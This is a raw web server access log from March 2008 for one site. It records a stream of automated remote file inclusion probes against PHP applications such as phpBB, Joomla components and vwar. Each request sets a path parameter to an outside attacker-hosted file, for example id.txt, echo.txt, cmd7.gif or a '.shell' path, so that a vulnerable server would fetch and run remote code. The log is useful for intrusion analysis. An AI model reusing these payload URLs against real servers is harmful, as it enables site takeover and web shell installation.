62.65.34.76 - - [04/Mar/2008:07:43:55 -0800] "GET /logs/menu.php??phpbb_root_path=%20phpbbhttp://suwung.890m.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
62.65.34.76 - - [04/Mar/2008:07:43:55 -0800] "GET /menu.php??phpbb_root_path=%20phpbbhttp://suwung.890m.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:07:44:10 -0800] "GET /logs/access_080131.log//modules/vwar/admin/admin.php?vwar_root=http://albinfo.freehostia.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
219.94.162.186 - - [04/Mar/2008:07:44:21 -0800] "GET /logs/access_080103.log/index.php?option=com_sociolize&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.162.186 - - [04/Mar/2008:07:44:21 -0800] "GET /logs/index.php?option=com_sociolize&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.162.186 - - [04/Mar/2008:07:44:21 -0800] "GET /logs/access_080221.log/index.php?option=com_sociolize&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:07:44:22 -0800] "GET /logs/access_080122.log//modules/vwar/admin/admin.php?vwar_root=http://albinfo.freehostia.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:07:44:55 -0800] "GET /logs/access_080221.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:07:44:56 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:07:44:57 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.185.237.140 - - [04/Mar/2008:07:45:14 -0800] "GET //skin/zero_vote/error.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.26.174.71 - - [04/Mar/2008:07:45:24 -0800] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sillworks.com/alat/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
64.26.174.71 - - [04/Mar/2008:07:45:25 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sillworks.com/alat/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
64.26.174.71 - - [04/Mar/2008:07:45:26 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sillworks.com/alat/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
207.58.129.229 - - [04/Mar/2008:07:45:40 -0800] "GET /logs/access_080118.log//modules/vwar/admin/admin.php?vwar_root=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:07:45:43 -0800] "GET /logs/access_080211.log//modules/vwar/admin/admin.php?vwar_root=http://albinfo.freehostia.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.104.248.62 - - [04/Mar/2008:07:45:44 -0800] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/rha.mutzz/file/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
208.104.248.62 - - [04/Mar/2008:07:45:44 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/rha.mutzz/file/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.162.147.212 - - [04/Mar/2008:07:45:47 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:07:45:49 -0800] "GET /logs/access_080126.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.freewebtown.com/civiclx/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:07:45:49 -0800] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.freewebtown.com/civiclx/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.104.248.62 - - [04/Mar/2008:07:45:52 -0800] "GET /logs/access_080111.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/rha.mutzz/file/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
208.104.248.62 - - [04/Mar/2008:07:45:53 -0800] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/rha.mutzz/file/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.93.107.242 - - [04/Mar/2008:07:45:53 -0800] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.hollywoodgolfclub.org/.../arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.104.248.62 - - [04/Mar/2008:07:45:53 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/rha.mutzz/file/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.93.107.242 - - [04/Mar/2008:07:45:53 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.hollywoodgolfclub.org/.../arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [04/Mar/2008:07:45:54 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.hollywoodgolfclub.org/.../arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
219.94.162.186 - - [04/Mar/2008:07:46:08 -0800] "GET /logs/access_080124.log/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.162.186 - - [04/Mar/2008:07:46:08 -0800] "GET /logs/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.104.248.62 - - [04/Mar/2008:07:46:09 -0800] "GET /logs/access_080111.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/rha.mutzz/file/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.93.107.242 - - [04/Mar/2008:07:46:31 -0800] "GET /logs/access_080216.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.hollywoodgolfclub.org/.../arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.140 - - [04/Mar/2008:07:46:32 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.140 - - [04/Mar/2008:07:46:32 -0800] "GET //skin/zero_vote/error.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.140 - - [04/Mar/2008:07:46:32 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.26.174.71 - - [04/Mar/2008:07:46:35 -0800] "GET /logs/access_080216.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sillworks.com/alat/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.89.21.88 - - [04/Mar/2008:07:46:49 -0800] "GET /logs/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.schuleniederwil.ch/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.21.88 - - [04/Mar/2008:07:46:49 -0800] "GET /components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.schuleniederwil.ch/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.216.205.192 - - [04/Mar/2008:07:47:31 -0800] "GET //skin/zero_vote/error.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.99.2.85 - - [04/Mar/2008:07:47:40 -0800] "GET /index2.php?x=http://ewo.sufx.net/electro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.205.192 - - [04/Mar/2008:07:47:44 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.205.192 - - [04/Mar/2008:07:47:44 -0800] "GET //skin/zero_vote/error.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.205.192 - - [04/Mar/2008:07:47:44 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.2.130 - - [04/Mar/2008:07:47:44 -0800] "GET /logs/access_080211.log/signin.php?_AMGconfig[cfg_serverpath]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [04/Mar/2008:07:47:44 -0800] "GET /logs/signin.php?_AMGconfig[cfg_serverpath]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.140 - - [04/Mar/2008:07:47:49 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:07:48:18 -0800] "GET /logs/access_080131.log//modules/vwar/admin/admin.php?vwar_root=http://albinfo.freehostia.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.135.60.191 - - [04/Mar/2008:07:48:21 -0800] "GET /logs/access_080124.log//modules/My_eGallery/public/displayCategory.php?dir=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.80.107.11 - - [04/Mar/2008:07:48:24 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
220.80.107.11 - - [04/Mar/2008:07:48:25 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
66.35.39.129 - - [04/Mar/2008:07:48:39 -0800] "GET /components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://kgny.us/files/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.81.28 - - [04/Mar/2008:07:49:11 -0800] "GET /logs/access_080118.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [04/Mar/2008:07:49:11 -0800] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [04/Mar/2008:07:49:11 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.162.186 - - [04/Mar/2008:07:49:27 -0800] "GET /signin.php?_AMGconfig[cfg_serverpath]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.162.186 - - [04/Mar/2008:07:49:29 -0800] "GET /logs/access.log/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.29.145.12 - - [04/Mar/2008:07:49:29 -0800] "GET /logs///mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
58.29.145.12 - - [04/Mar/2008:07:49:29 -0800] "GET ///mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
209.216.205.192 - - [04/Mar/2008:07:49:52 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.83.47.82 - - [04/Mar/2008:07:50:25 -0800] "GET /logs/access_080111.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.kapanakuke.com/dyingdevil.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [04/Mar/2008:07:50:26 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.kapanakuke.com/dyingdevil.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [04/Mar/2008:07:50:26 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.kapanakuke.com/dyingdevil.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.21.65 - - [04/Mar/2008:07:50:30 -0800] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.21.65 - - [04/Mar/2008:07:50:31 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.21.65 - - [04/Mar/2008:07:50:31 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.83.47.82 - - [04/Mar/2008:07:50:53 -0800] "GET /logs/access_080120.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.kapanakuke.com/dyingdevil.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.69.144.194 - - [04/Mar/2008:07:51:06 -0800] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.69.144.194 - - [04/Mar/2008:07:51:07 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:07:51:07 -0800] "GET /logs/access_080120.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.69.144.194 - - [04/Mar/2008:07:51:07 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.33.49.76 - - [04/Mar/2008:07:51:21 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.econfusion.de/frrresh_de/content/img/cmd7.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
64.33.49.76 - - [04/Mar/2008:07:51:22 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.econfusion.de/frrresh_de/content/img/cmd7.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
62.65.34.76 - - [04/Mar/2008:07:51:24 -0800] "GET /logs/?phpbb_root_path=http://suwung.890m.com/test.txt??? HTTP/1.1" 200 37260 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
62.65.34.76 - - [04/Mar/2008:07:51:24 -0800] "GET /?phpbb_root_path=http://suwung.890m.com/test.txt??? HTTP/1.1" 200 3094 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
64.33.49.76 - - [04/Mar/2008:07:51:24 -0800] "GET //class.mysql.php?path_to_bt_dir=http://www.econfusion.de/frrresh_de/content/img/cmd7.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
64.33.49.76 - - [04/Mar/2008:07:51:25 -0800] "GET /logs//class.mysql.php?path_to_bt_dir=http://www.econfusion.de/frrresh_de/content/img/cmd7.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
66.35.39.129 - - [04/Mar/2008:07:51:36 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://kgny.us/files/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.2.130 - - [04/Mar/2008:07:52:04 -0800] "GET /logs/access_080201.log/signin.php?_AMGconfig[cfg_serverpath]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.216.205.192 - - [04/Mar/2008:07:52:09 -0800] "GET /logs/access_080103.log//skin/zero_vote/error.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.205.192 - - [04/Mar/2008:07:52:09 -0800] "GET //skin/zero_vote/error.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.205.192 - - [04/Mar/2008:07:52:09 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.106.19.213 - - [04/Mar/2008:07:52:23 -0800] "GET /?vsdragonrootpath=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 200 3094 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.21.65 - - [04/Mar/2008:07:52:44 -0800] "GET /logs/access_080131.log//modules/vwar/admin/admin.php?vwar_root=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.179.86.163 - - [04/Mar/2008:07:52:53 -0800] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.179.86.163 - - [04/Mar/2008:07:52:54 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.179.86.163 - - [04/Mar/2008:07:52:54 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.155.165.40 - - [04/Mar/2008:07:53:09 -0800] "GET /logs/access_080208.log/index.php?body=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.155.165.40 - - [04/Mar/2008:07:53:11 -0800] "GET /index.php?body=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.155.165.40 - - [04/Mar/2008:07:53:13 -0800] "GET /logs/index.php?body=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.25.197.114 - - [04/Mar/2008:07:53:22 -0800] "GET /logs/access_080211.log/signin.php?_AMGconfig[cfg_serverpath]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.25.197.114 - - [04/Mar/2008:07:53:23 -0800] "GET /logs/signin.php?_AMGconfig[cfg_serverpath]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.67.21.65 - - [04/Mar/2008:07:53:36 -0800] "GET /logs/access_080118.log//modules/vwar/admin/admin.php?vwar_root=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.179.86.163 - - [04/Mar/2008:07:53:46 -0800] "GET /logs/access_071222.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.179.86.163 - - [04/Mar/2008:07:53:47 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.179.86.163 - - [04/Mar/2008:07:53:47 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:07:54:17 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/civiclx/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.180.216.43 - - [04/Mar/2008:07:54:59 -0800] "GET /logs/access_080118.log//modules/vwar/admin/admin.php?vwar_root=http://servicesbrazil.net/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.67.21.65 - - [04/Mar/2008:07:55:06 -0800] "GET /logs/access_080122.log//modules/vwar/admin/admin.php?vwar_root=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.21.65 - - [04/Mar/2008:07:55:11 -0800] "GET /logs/access_080211.log//modules/vwar/admin/admin.php?vwar_root=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.180.216.43 - - [04/Mar/2008:07:55:29 -0800] "GET /logs/access_080101.log//index.php?pageurl=http://servicesbrazil.net/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.180.216.43 - - [04/Mar/2008:07:55:36 -0800] "GET //index.php?pageurl=http://servicesbrazil.net/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.180.216.43 - - [04/Mar/2008:07:55:39 -0800] "GET /logs//index.php?pageurl=http://servicesbrazil.net/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
221.6.101.22 - - [04/Mar/2008:07:55:43 -0800] "GET /logs/access.log//include.php?path[docroot]=http://treguonline.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.129.229 - - [04/Mar/2008:07:55:45 -0800] "GET /logs/access_080101.log//index.php?pageurl=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.129.229 - - [04/Mar/2008:07:55:45 -0800] "GET //index.php?pageurl=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.6.101.22 - - [04/Mar/2008:07:55:45 -0800] "GET //include.php?path[docroot]=http://treguonline.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.129.229 - - [04/Mar/2008:07:55:45 -0800] "GET /logs//index.php?pageurl=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.6.101.22 - - [04/Mar/2008:07:55:46 -0800] "GET /logs//include.php?path[docroot]=http://treguonline.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.179.86.163 - - [04/Mar/2008:07:56:15 -0800] "GET /logs/access_080216.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.179.86.163 - - [04/Mar/2008:07:56:27 -0800] "GET /logs/access_080121.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:07:56:38 -0800] "GET /logs/access_080118.log//modules/vwar/admin/admin.php?vwar_root=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.55.147.205 - - [04/Mar/2008:07:58:08 -0800] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.55.147.205 - - [04/Mar/2008:07:58:08 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
